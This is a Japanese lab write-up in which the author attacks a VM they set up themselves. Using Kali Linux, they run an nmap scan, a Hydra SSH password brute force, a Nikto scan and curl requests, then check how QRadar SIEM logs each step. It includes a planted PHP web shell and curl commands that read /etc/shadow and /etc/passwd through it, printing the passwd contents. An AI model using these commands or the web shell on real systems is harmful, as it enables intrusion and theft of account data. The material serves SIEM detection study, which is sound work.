必ず自分の管轄下のサーバ等に対して行う事。
管轄外のサーバ等に許可なく行う事は、サイバー犯罪に該当してしまう可能性があります。
今までQRadar並びにSIEMの勉強をしてきましたが、もう少し拡張していきたいと思います。より攻撃っぽくするために実際の攻撃の流れに沿って偵察⇒侵入⇒脆弱性調査⇒情報奪取をKali Linuxを使って試してみます。
環境イメージ
Kali Linuxでnmapを使って、攻撃対象のポートで何が開いているかを確認。
その後、HydraやNiktoを使って開いているポート(今回はSSH、HTTP)を対象に、ログインが出来るか、どのような脆弱性があるかを確認。
最後に権限昇格の思考としてcurlを使って情報奪取をするという事をしてみます。
そしてそれぞれの実行ログをQRadarで確認してみます。

用語
nmap
攻撃の第一段階である「偵察」として、ターゲットの開いているポートを調査する手法です。QRadarでは、UFW(ファイアウォール)が拒否した大量の「[UFW BLOCK]」ログとして記録され、短時間に多くのポートを叩く不審な動きとして検知されます。
Hydra(ヒドラ)
SSHなどのログイン画面に対し、辞書ファイルを用いて高速にパスワード総当たりを試みる手法です。
QRadarには「Failed password」という認証失敗ログが短時間に猛烈な勢いで届くため、単なる入力ミスではない「乗っ取りの試み」として高い優先度で検知されます。
Nikto(ニクト)
Webサーバーに対し、設定不備や脆弱なファイル(管理画面や古いスクリプト)がないか自動調査する手法です。
QRadarではApacheのアクセスログとして記録され、存在しないファイルへの大量の「404 Not Found」や、ペイロードに含まれる攻撃的な文字列(/etc/passwd等)が検知の対象となります。
検証
攻撃対象の準備
ProxmoxのLXCでは一部の動作が上手くいかなかったので、VMを新規で立ち上げます。
VMを立ち上げたら、apt update と apt upgradeをして、パッケージを最新化しておきます。
次にiptablesとapache,phpをインストールしてWebサーバ化しておきます。
まずwebサーバ化しておきます。
root@ohtsuka-qradar-target01:~# apt install -y apache2
root@ohtsuka-qradar-target01:~# systemctl enable apache2
root@ohtsuka-qradar-target01:~# systemctl start apache2
次にiptablesがインストールされていることを確認します。
root@ohtsuka-qradar-target02:~# iptables -V
iptables v1.8.10 (nf_tables)
ufwを有効化してログを出力する設定を入れておきます。
root@ohtsuka-qradar-target02:~# ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
root@ohtsuka-qradar-target02:~# ufw allow 22/tcp
Rule added
Rule added (v6)
root@ohtsuka-qradar-target02:~# ufw allow 80/tcp
Rule added
Rule added (v6)
root@ohtsuka-qradar-target02:~# ufw status
Status: active
To Action From
-- ------ ----
22/tcp ALLOW Anywhere
80/tcp ALLOW Anywhere
22/tcp (v6) ALLOW Anywhere (v6)
80/tcp (v6) ALLOW Anywhere (v6)
root@ohtsuka-qradar-target02:~# ufw logging medium
Logging enabled
同様にqradar.confに修正を行います。
IPアドレスはQRadarのホストのものを記載します。
root@ohtsuka-qradar-target01:~# nano /etc/rsyslog.d/qradar.conf
root@ohtsuka-qradar-target02:~# cat /etc/rsyslog.d/qradar.conf
# Use traditional syslog format
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
# Forward generic system logs
user.* @172.18.250.163:514
daemon.* @172.18.250.163:514
syslog.* @172.18.250.163:514
# Forward authentication logs (includes SSH / sudo related logs)
auth.* @172.18.250.163:514
authpriv.* @172.18.250.163:514
# Load imfile module to monitor text files
module(load="imfile")
# Apache Access Log
input(type="imfile"
File="/var/log/apache2/access.log"
Tag="apache-access:"
Severity="info"
Facility="local6")
# Forward local6 (Apache logs) to QRadar
local6.* @172.18.250.163:514
# Forward Firewall (ufw) logs
kern.* @172.18.250.163:514
PHPをインストールしていきます。
root@ohtsuka-qradar-target02:~# apt install -y php libapache2-mod-php
攻撃
【偵察】ネットワークスキャン(Nmap)
以下のコマンドをKali上で実行します。
- -sS: ステルススキャン(TCP SYNスキャン)
- -Pn: 相手がPingに応答しなくてもスキャンを実行
スキャンが完了すると、レポートが出力されます。
対象ホストが起動していることやマックアドレスなどが表示されていますね。
PortもUFWで許可しているものだけが出力されていることがわかります。
┌──(root㉿ohtsuka-kali)-[~]
└─# nmap -sS -Pn 172.18.250.18
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-04 21:30 +0900
Nmap scan report for 172.18.250.18
Host is up (0.00067s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: BC:24:11:3E:98:72 (Proxmox Server Solutions GmbH)
Nmap done: 1 IP address (1 host up) scanned in 5.63 seconds
QRadarにアクセスします。ログ・アクティビティータブを開きます。
パラメータ:ペイロードに含まれる
演算子:次である
値:UFW BLOCK

出力されます。一番上の行をダブルクリックして詳細を確認します。

【侵入】ブルートフォース攻撃の自動化(Hydra)
Hydraを使ってSSHへのブルートフォースを仕掛けます。
Kali Linuxの/usr/share/wordlist/fasttrack.txtを見るとパスワード候補のリストファイルがあることがわかります。

KaliでTerminalを開いて、以下のコマンドを実行します。
testユーザでパスワード候補はfasttrack.txtのものを使用するという内容です。
脆弱なパスワードにしていたので、test/passwordでログイン出来るという事がばれてますね。
┌──(root㉿ohtsuka-kali)-[~]
└─# hydra -l test -P /usr/share/wordlists/fasttrack.txt ssh://172.18.250.18 -t 4
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-05-04 21:27:48
[DATA] max 4 tasks per 1 server, overall 4 tasks, 262 login tries (l:1/p:262), ~66 tries per task
[DATA] attacking ssh://172.18.250.18:22/
[STATUS] 69.00 tries/min, 69 tries in 00:01h, 193 to do in 00:03h, 4 active
[22][ssh] host: 172.18.250.18 login: test password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-05-04 21:29:19
QRadarでログを確認してみます。
パラメータ:ペイロードに含まれる
演算子:次である
値:failed password

イベント数を見ると、それなりに数があることがわかると思います。

オフェンスにも出力があります。
今回は172.18.250.18の方になります。Hydraでのパスワードクラックが1つの攻撃として収集されていることが、ここに表記されていることからわかります。

【脆弱性調査】Web脆弱性スキャン(Nikto)
Kaliで以下のコマンドを実行します。
ターゲット(172.18.250.18)のWebサーバーに対して 8,083回ものリクエストを送り、設定の不備や古いソフトウェアの脆弱性を調査した結果になります。"Suggested security header missing: content-security-policy"等という記載からXSS等を防ぐ設定がされてないこと、実行できるHTTPメソッドなどがわかります。
┌──(root㉿ohtsuka-kali)-[~]
└─# nikto -h http://172.18.250.18
- Nikto v2.6.0
---------------------------------------------------------------------------
+ Your Nikto installation is out of date.
+ Target IP: 172.18.250.18
+ Target Hostname: 172.18.250.18
+ Target Port: 80
+ Platform: Linux/Unix
+ Start Time: 2026-05-04 21:18:45 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.58 (Ubuntu)
+ No CGI Directories found (use '-C all' to force check all possible dirs). CGI tests skipped.
+ [999984] /: Server may leak inodes via ETags, header found with file /, inode: 29af, size: 650fb6368d404, mtime: gzip. See: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ [013587] /: Suggested security header missing: referrer-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy
+ [013587] /: Suggested security header missing: x-content-type-options. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options
+ [013587] /: Suggested security header missing: content-security-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
+ [013587] /: Suggested security header missing: strict-transport-security. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ [013587] /: Suggested security header missing: permissions-policy. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy
+ [600050] Apache/2.4.58 appears to be outdated (current is at least 2.4.66).
+ [999990] OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ [007342] /: X-Frame-Options header is deprecated and was replaced with the Content-Security-Policy HTTP header with the frame-ancestors directive. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/X-Frame-Options
+ [007352] /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ 8083 requests: 16 errors and 10 items reported on the remote host
+ End Time: 2026-05-04 21:24:24 (GMT9) (339 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
QRadarで確認します。
パラメータ:ペイロードに含まれる
演算子:次である
値:apache-access

オフェンスについては、apache-accessのものが無かったです。
この辺りはチューニングしてQRadarに攻撃だと教える必要があるっぽいです。これは今後勉強してみます。
勉強してみまたした。
独自ルールを作ってオフェンスを発生させる手順です。
【情報奪取】情報奪取の試行 (Exploit)
一旦失敗してみます。curlコマンドで以下を実行します。
┌──(root㉿ohtsuka-kali)-[~]
└─# curl "http://172.18.250.18/index.php?exec=cat+/etc/shadow"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.58 (Ubuntu) Server at 172.18.250.18 Port 80</address>
</body></html>
QRadarで検索をかけてみます。
パラメータ:ペイロードに含まれる
演算子:次である
値:cat+/etc/shadow

中身を見てみます。"<182>May 4 12:53:39 ohtsuka-qradar-target02 apache-access: 172.18.251.68 - - [04/May/2026:12:53:39 +0000] "GET /index.php?exec=cat+/etc/shadow HTTP/1.1" 404 436 "-" "curl/8.19.0""というログが出ています。404ではじかれていることがわかります。

【情報奪取】リモートコードエグゼキューション (Remote Code Execution,RCE)
先程は失敗しましたが、それはindex.phpというファイルを置いていなかったのが原因です。今回はSSH接続用のユーザ(test/password)という事を攻撃者はHydraの攻撃により把握しているので、そのユーザを使って攻撃用のindex.phpを置いてそれをcurlコマンドからキックして/etc/passwdの情報を奪取してみたいと思います。
┌──(root㉿ohtsuka-kali)-[~]
└─# ssh test@172.18.250.18
test@172.18.250.18's password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-111-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon May 4 01:54:22 PM UTC 2026
System load: 0.0
Usage of /: 39.5% of 14.66GB
Memory usage: 11%
Swap usage: 0%
Processes: 122
Users logged in: 1
IPv4 address for ens18: 172.18.250.18
IPv6 address for ens18: fd34:c6bb:656f:de65:be24:11ff:fe3e:9872
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
*** System restart required ***
Last login: Mon May 4 13:45:04 2026 from 172.18.251.68
test@ohtsuka-qradar-target02:~$ sudo nano /var/www/html/index.php
[sudo] password for test:
test@ohtsuka-qradar-target02:~$ sudo cat /var/www/html/index.php
<?php
if(isset($_GET['cmd'])) {
echo "Command output:\n";
system($_GET['cmd']);
}
?>
test@ohtsuka-qradar-target02:~$ sudo chmod 644 /var/www/html/index.php
test@ohtsuka-qradar-target02:~$ sudo chown www-data:www-data /var/www/html/index.php
実際にcurlを使ってキックしていきます。
なんと、遠隔で/etc/passwdの情報を取得できてしまいました。
他にどんなユーザがいるのか、攻撃者に漏れてしまいました。
┌──(root㉿ohtsuka-kali)-[~]
└─# curl "http://172.18.250.18/index.php?cmd=cat+/etc/passwd"
Command output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
test:x:1000:1000:test:/home/test:/bin/bash















